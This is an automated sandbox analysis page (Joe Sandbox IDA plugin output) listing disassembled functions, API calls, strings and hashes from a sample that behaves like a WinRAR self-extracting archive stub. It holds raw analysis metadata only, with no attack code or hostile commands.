Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-311033401
Opcode ID: ca0ce803f92a9af32d9ead6a166dfae64a8bb02617374e9624908fa6dc0a59ab
Instruction ID: e77cf46fdda9ecd0c638c2a61c546f25b723ad3948a16523d04a7e3243977997
Opcode Fuzzy Hash: ca0ce803f92a9af32d9ead6a166dfae64a8bb02617374e9624908fa6dc0a59ab
Instruction Fuzzy Hash: DD42F170944258BAEF21BBA4AD8AFBE3B7CFB01700F080159F641E61D2DB755E44CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00890863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0089087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0089088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008908BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00890B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00890B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00890B93
ReadFile.KERNEL32(00000000,?,00007FFE,008B3C7C,00000000), ref: 00890BB1
CloseHandle.KERNEL32(00000000), ref: 00890C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00890C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,008B3C7C,?,00000000,?,00000800), ref: 00890C72
GetFileAttributesW.KERNELBASE(?,?,008B3C7C,00000800,?,00000000,?,00000800), ref: 00890C9C
GetFileAttributesW.KERNEL32(?,?,008B3D44,00000800), ref: 00890CD8

Part of subcall function 0089081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
Part of subcall function 0089081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858

_swprintf.LIBCMT ref: 00890D4A
_swprintf.LIBCMT ref: 00890D96

Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5

AllocConsole.KERNEL32 ref: 00890D9E
GetCurrentProcessId.KERNEL32 ref: 00890DA8
AttachConsole.KERNEL32(00000000), ref: 00890DAF
_wcslen.LIBCMT ref: 00890DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00890DD5
WriteConsoleW.KERNEL32(00000000), ref: 00890DDC
Sleep.KERNEL32(00002710), ref: 00890DE7
FreeConsole.KERNEL32 ref: 00890DED
ExitProcess.KERNEL32 ref: 00890DF5

Strings

uxtheme.dll, xrefs: 00890D17
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00890D84
DXGIDebug.dll, xrefs: 008908FC, 00890C5E
SetDefaultDllDirectories, xrefs: 008908B9
SetDllDirectoryW, xrefs: 00890888
kernel32, xrefs: 00890873
dwmapi.dll, xrefs: 00890927, 00890D0D

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: f32a21571c791f9c10849fae342df0559a27052dcaaa8949c7c0bb384d995d78
Instruction ID: 43abcc0e90a5a5ec2c779b9d865dabcca2f493307cf0f79b5ad31588c8a9a0e8
Opcode Fuzzy Hash: f32a21571c791f9c10849fae342df0559a27052dcaaa8949c7c0bb384d995d78
Instruction Fuzzy Hash: 55D17DB1448784AFD721AF948849ADFBBE8FF84308F54091DF285D6351CBB0964DCB62

Uniqueness

Uniqueness Score: -1.00%

Function 0089C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0089C744

Part of subcall function 0089B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0089B3FB

_wcslen.LIBCMT ref: 0089CA0A
_wcslen.LIBCMT ref: 0089CA13
SetWindowTextW.USER32(?,?), ref: 0089CA71
_wcslen.LIBCMT ref: 0089CAB3
_wcsrchr.LIBVCRUNTIME ref: 0089CBFB
GetDlgItem.USER32(?,00000066), ref: 0089CC36
SetWindowTextW.USER32(00000000,?), ref: 0089CC46
SendMessageW.USER32(00000000,00000143,00000000,008CA472), ref: 0089CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0089CC7F

Strings

<br>, xrefs: 0089C9D4
ProgramFilesDir, xrefs: 0089CB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 0089CB1A
%s.%d.tmp, xrefs: 0089C940

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 1ba9d8eb09eb08db16d25ab83bba740955aceb3bae4b555affe132c3f286afb1
Instruction ID: 44f7172fe89a642ddcba0740c0acbf24fd13b6e9cdde8e3dc3890e77c25cf4e3
Opcode Fuzzy Hash: 1ba9d8eb09eb08db16d25ab83bba740955aceb3bae4b555affe132c3f286afb1
Instruction Fuzzy Hash: 7BE151B2900218AADF25EBA4DD85EEE77BCFB05310F4441A6F609E7141EB749F848B61

Uniqueness

Uniqueness Score: -1.00%

Function 0088DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0088DA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0088DAAC

Part of subcall function 0088C29A: _wcslen.LIBCMT ref: 0088C2A2

Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0

Part of subcall function 00891B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0088BAE9,00000000,?,?,?,0001042C), ref: 00891BA0

_wcslen.LIBCMT ref: 0088DDE9
__fprintf_l.LIBCMT ref: 0088DF1C

Strings

$%s:, xrefs: 0088DEFF
*messages***, xrefs: 0088DBFA
RTL, xrefs: 0088DEDE
R, xrefs: 0088DC0C
*messages***, xrefs: 0088DBC1
, xrefs: 0088DD6C
a, xrefs: 0088DC16
,, xrefs: 0088DF57
@%s:, xrefs: 0088DF06, 0088DF12

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 3c643bb06e209d48a945d5614e4a986e0ca4b6e425b2478c3be7c3ec6d278b17
Instruction ID: f9554537217c20934b71a38231cf99721500bdfef9a77883f20eb403fa622fb8
Opcode Fuzzy Hash: 3c643bb06e209d48a945d5614e4a986e0ca4b6e425b2478c3be7c3ec6d278b17
Instruction Fuzzy Hash: 7C32ED71900218EBDF24FF68C845AEE77A9FF15304F44056AF906EB281EBB1AD84CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0089D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0089B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
Part of subcall function 0089B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
Part of subcall function 0089B568: IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
Part of subcall function 0089B568: TranslateMessage.USER32(?), ref: 0089B5AC
Part of subcall function 0089B568: DispatchMessageW.USER32(?), ref: 0089B5B6

GetDlgItem.USER32(00000068,008DFCB8), ref: 0089D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,0089AF07,00000001,?,?,0089B7B9,008B506C,008DFCB8,008DFCB8,00001000,00000000,00000000), ref: 0089D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0089D51B
SendMessageW.USER32(00000000,000000C2,00000000,008B35F4), ref: 0089D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0089D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0089D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D5E1
SendMessageW.USER32(00000000,000000C2,00000000,008B43F4), ref: 0089D5F0

Strings

\, xrefs: 0089D549

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 7fa372499b275f112bdaf6d63348f8c0a4e6235f02f6bfce28d8a4fca174a29e
Instruction ID: 51e80281ade20679186bd4edb9d205ebdbe0f7660ba587846006fd8630703bbf
Opcode Fuzzy Hash: 7fa372499b275f112bdaf6d63348f8c0a4e6235f02f6bfce28d8a4fca174a29e
Instruction Fuzzy Hash: 0431AF71149782ABE301EF249C8EFAB7FACFB86704F040518F551DB2A1DB759A04877A

Uniqueness

Uniqueness Score: -1.00%

Function 0089D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0089D7AE
ShellExecuteExW.SHELL32(?), ref: 0089D8DE
ShowWindow.USER32(?,00000000), ref: 0089D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 0089D959
CloseHandle.KERNEL32(?), ref: 0089D97F
ShowWindow.USER32(?,00000001), ref: 0089D9E1

Strings

.exe, xrefs: 0089D989
.inf, xrefs: 0089D89A

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 6e42f3466be23ee0891d49a44d79ee2b702e9fb74b88997102a349f0da6a8ffd
Instruction ID: 30dd999fced553497647bd4819765de03a295584cb31deb68078db43a410ba05
Opcode Fuzzy Hash: 6e42f3466be23ee0891d49a44d79ee2b702e9fb74b88997102a349f0da6a8ffd
Instruction Fuzzy Hash: C451B2715083849ADF31BB249844BABBBE4FF85744F0C082EF9C5E7292E7718945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 008AA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008A5695,008A5695,?,?,?,008AABAC,00000001,00000001,2DE85006), ref: 008AA9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008AABAC,00000001,00000001,2DE85006,?,?,?), ref: 008AAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008AAB35
__freea.LIBCMT ref: 008AAB42

Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38

__freea.LIBCMT ref: 008AAB4B
__freea.LIBCMT ref: 008AAB70

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 19dc83eb77cf9beffcd51bfbb4ed011f9f8d4ce7fa1ef560c6f5e72a66dbabc7
Instruction ID: 925585ad00a39d102fedd9250b3750a21f80e19b1b1e26af194e8c76d52b3c31
Opcode Fuzzy Hash: 19dc83eb77cf9beffcd51bfbb4ed011f9f8d4ce7fa1ef560c6f5e72a66dbabc7
Instruction Fuzzy Hash: 6C51C372600216AFFB298E64CC41EBBB7AAFB46760F154628FC14D6950DB34DC51C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 008A3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,008A3C35,?,?,008E2088,00000000,?,008A3D60,00000004,InitializeCriticalSectionEx,008B6394,InitializeCriticalSectionEx,00000000), ref: 008A3C03

Strings

api-ms-, xrefs: 008A3BC3

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 9fb114c6e746ee8b83463fde2fa08f75d09958173846157ce8cb90582d11d610
Instruction ID: 4dff13c717faa2ff4d1f4a1153e5eca4b615b1a2c2ffb08256f299ffc12afcf5
Opcode Fuzzy Hash: 9fb114c6e746ee8b83463fde2fa08f75d09958173846157ce8cb90582d11d610
Instruction Fuzzy Hash: AD11C232A45625ABEF228B689C41B5A37A5FF03770F250220F955FB6D0E774EF0186E1

Uniqueness

Uniqueness Score: -1.00%

Function 0089ABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0089ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 0089ABF9

Part of subcall function 00891FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0088C116,00000000,.exe,?,?,00000800,?,?,?,00898E3C), ref: 00891FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0089ABE9

Strings

@Ut, xrefs: 0089ABF9
EDIT, xrefs: 0089ABCD, 0089ABD8, 0089ABE5

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: ac33a1a7dbf7e08ef2f30fe382217a58d9f7a3896e057c9905d9354866ef2bee
Instruction ID: 096f9ba387c748e8a9c790f76da9ee27dbccc5129c50eeb6a524068500326938
Opcode Fuzzy Hash: ac33a1a7dbf7e08ef2f30fe382217a58d9f7a3896e057c9905d9354866ef2bee
Instruction Fuzzy Hash: D5F0E23270062976DF20B6659C09FEB726CFB82B10F4C0021BA44E7180DB60EE4185F6

Uniqueness

Uniqueness Score: -1.00%

Function 0089AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0089081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
Part of subcall function 0089081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858

OleInitialize.OLE32(00000000), ref: 0089AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0089AC66
SHGetMalloc.SHELL32(008C8438), ref: 0089AC70

Strings

3So, xrefs: 0089AC47
riched20.dll, xrefs: 0089AC1E

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3So
API String ID: 3498096277-3464455743
Opcode ID: b0aba75358bcf16fcc69db09ae46caa0e435fbd175647fb53458c1508594df3b
Instruction ID: 7d7b71d4241ff972b4dd8883c2f787ce4f1f7b3b2a497e97d281fe702f258552
Opcode Fuzzy Hash: b0aba75358bcf16fcc69db09ae46caa0e435fbd175647fb53458c1508594df3b
Instruction Fuzzy Hash: 73F0F9B1900249ABCB10AFA9D8499EFFFFCFF94700F00415AA815E2241DBB856058FA1

Uniqueness

Uniqueness Score: -1.00%

Function 008898E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00887760,?,00000005,?,00000011), ref: 0088995F
GetLastError.KERNEL32(?,?,00887760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0088996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00887760,?,00000005,?), ref: 008899A2
GetLastError.KERNEL32(?,?,00887760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008899AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00887760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008899F9

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 11d73bbcc5f3699d89fbf459467d5e820e054965ac6725096b3ca81d32b21cd6
Instruction ID: 043599beb7356de35ce4104307378a5f11d8a202d71070fcfe8f8f1334c30c41
Opcode Fuzzy Hash: 11d73bbcc5f3699d89fbf459467d5e820e054965ac6725096b3ca81d32b21cd6
Instruction Fuzzy Hash: DE312F30584745AFE720AB24CC46BAABF98FB40320F280B19F9E1D21D1D3B4A985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0089B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
TranslateMessage.USER32(?), ref: 0089B5AC
DispatchMessageW.USER32(?), ref: 0089B5B6

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: ef74eee7f7af090e2ce0d168e4d21f22bb10c51202b415578197eabfff61d5b7
Instruction ID: cc322cc126ebca06bcd66fef720788bd3c5faa8c54d2d7063ef8aaa739a1a898
Opcode Fuzzy Hash: ef74eee7f7af090e2ce0d168e4d21f22bb10c51202b415578197eabfff61d5b7
Instruction Fuzzy Hash: 6CF0B771A0126AAB8F20ABE6AD8CDEB7FBCFE453917444415B919D3010EB34DA05CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0089DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0089DBF4
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0089DC30

Strings

sfxcmd, xrefs: 0089DBEF
sfxpar, xrefs: 0089DC2B

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
